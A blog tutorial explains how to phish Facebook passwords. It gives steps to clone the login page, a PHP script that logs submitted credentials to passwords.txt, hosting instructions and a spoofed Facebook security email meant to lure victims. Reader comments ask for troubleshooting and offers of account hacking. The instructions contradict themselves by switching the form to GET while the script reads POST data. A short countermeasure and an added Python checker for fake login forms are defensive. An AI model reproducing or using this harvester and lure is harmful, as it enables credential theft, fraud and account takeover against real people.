Facebook Phishing Tutorial


Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:

First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.

To create phish.php:

Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/



Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.



Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.

Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com, 
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file. 



Please note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.


Countermeasure:
Do not respond to any message that claims to come from Facebook, whether it is legitimate or not, by clicking on links that appear in the mail. Whenever you receive a mail of this type, report it to Facebook after logging in by typing www.facebook.com into your web browser yourself.
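The countermeasure can also be checked mechanically on a page a user reports. The following is an added example, not part of the original post: it flags any password form that is served from, or submits to, a host other than the brand it imitates, or that sends the password by GET. The `lookalike.example` host and both sample pages are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BRAND = "facebook.com"  # domain the login page claims to belong to
# Constructed samples: a reported copy on an unrelated host, and the genuine form.
SUSPECT_URL = "http://lookalike.example/index.html"
SUSPECT_HTML = ('<form action="phish.php" method="get">'
                '<input type="text" name="email"><input type="password" name="pass"></form>')
GENUINE_URL = "https://www.facebook.com/"
GENUINE_HTML = ('<form action="https://www.facebook.com/login.php?login_attempt=1" method="post">'
                '<input type="text" name="email"><input type="password" name="pass"></form>')


class FormCollector(HTMLParser):
    """Collect each <form> and note whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "get").lower(),
                               "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True  # simplification: attach to latest form


def on_brand(host, brand=BRAND):
    """True only for the brand domain itself or a real subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return host == brand or host.endswith("." + brand)


def audit_login_page(page_url, html, brand=BRAND):
    """Return findings for every password form on the page (empty list = clean)."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in (f for f in collector.forms if f["password"]):
        # A relative action resolves against the page URL, as a browser would do.
        target = urlsplit(urljoin(page_url, form["action"]))
        if not on_brand(urlsplit(page_url).hostname, brand):
            findings.append("page-host-not-brand")
        if target.scheme != "https" or not on_brand(target.hostname, brand):
            findings.append("credentials-leave-brand")
        if form["method"] != "post":
            findings.append("password-sent-by-get")
    return findings
```

A form submitted by GET also writes the password into the URL, so it ends up in browser history and in proxy and web-server logs, which gives responders another place to look.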


27 comments:

  1. not working , passwords are not saving in passwords.txt

    Replies
    1. Friends, nowadays most free PHP webhosting sites like 000webhost, My3gb etc. are either not allowing phishing PHP scripts or manually checking PHP scripts uploaded to their sites. So try different webhosts; the procedure I explained above is the standard procedure we use to hack Facebook passwords.

  2. this is not working,,,,passwords.txt is blank,,,,,,

  3. that code is already detect on facebook...and its not working anymore :///

  4. hw 2 mk index.html page as index page nd mk it live...m nt able 2 do it,plzz explain??nd wich webhosts v shud use??

  5. sorry,maybe u can print screen each step for make easy understanding.tq~

  6. In Mobile You Can Phish Like This Mr. Kumar...

  7. hmm..m fan of u..but m not oposing u..but actualy this tecniq wont work anymore..ofcourse at all..bcoz almost al browsers gona find dis spam and also by antivirus..so its impossible with dis techniq from d security we hav..and one more is even webhostng sites also wont alow 4 dis purpose..u already knw dat..we can use webhosting site nly for nce and if dey find our illigal works den immediatly blocks our account..
    and we had a new phishing techniq..by using this techniq facebuk fake page seems like exactly like original.. www.facebook.com
    so we hav a chances from escaping from antivirus and browsers..but m not saying sure it works..bcoz facebuk getng recoverd from several bugs dialy..and by using backtrack also may help us..
    but one thing guyz..if we hav a good knowledge in internet spaming and litle concentration on our victims defnelty we can hack our frndz,gfz..etc anyonez account..datz sure..

  8. what was that??? " change the method in html from "post" to "get"???

    i am not able to understand tha.........plz help

    Replies
    1. Open index.html in notepd and search for something like
      Change dat action ="http://www.facebook.com/.." to action="phish.php" and also change method="post" to method="get" snd save this file

      Hope dis will help u for any queries contact me on fb http://www.facebook.com/Snkt.pat2

  9. Nice information about facebook. i read another article on your website which shows great information :D

    From,
    Using Google Sites :- Create Facebook Apps

  10. hey anyone here , can somebody pls tell how cud i make index.html file as the index page and make the site alive , i have a little bit confusion there , cuz there are no options given for that , , pls help guys pls help!

  11. hey if i'm not able to.. can you hack the account i want to?
    anyone????
    pleasee?
    i really need to have an access to that account.. means a lot to me.. trust me not for any other purpose.. just need to access it somehow.... someone please help?

  12. HOW CAN WE ENABLE INDEX.HTML AND SEND MAIL

  13. can somebody pls tell how cud i make index.html file as the index page and make the site alive , i have a little bit confusion there , cuz there are no options given for that , , pls help guys pls help!

  14. This comment has been removed by the author.

  15. create free site here http://www.000webhost.com/713013.html

  16. U r wrong mr. Santosh .i m sad coz i need it.
    I will tell you how to hack FB.
    It will take some time.

  17. I am in need of a facebook hack ... is there a service that can actually get me the login by paying ...

  18. This script works, but he got the method wrong. let it stay as POST. Dont Change it into GET. then you will see.. good luck guys. install the Wampserver and try it first

  19. can somebody pls tell how cud i make index.html file as the index page and make the site available ?????

  20. sir.. can you plz tell me that how can i make a spoofed email ,, i hv done all except this.
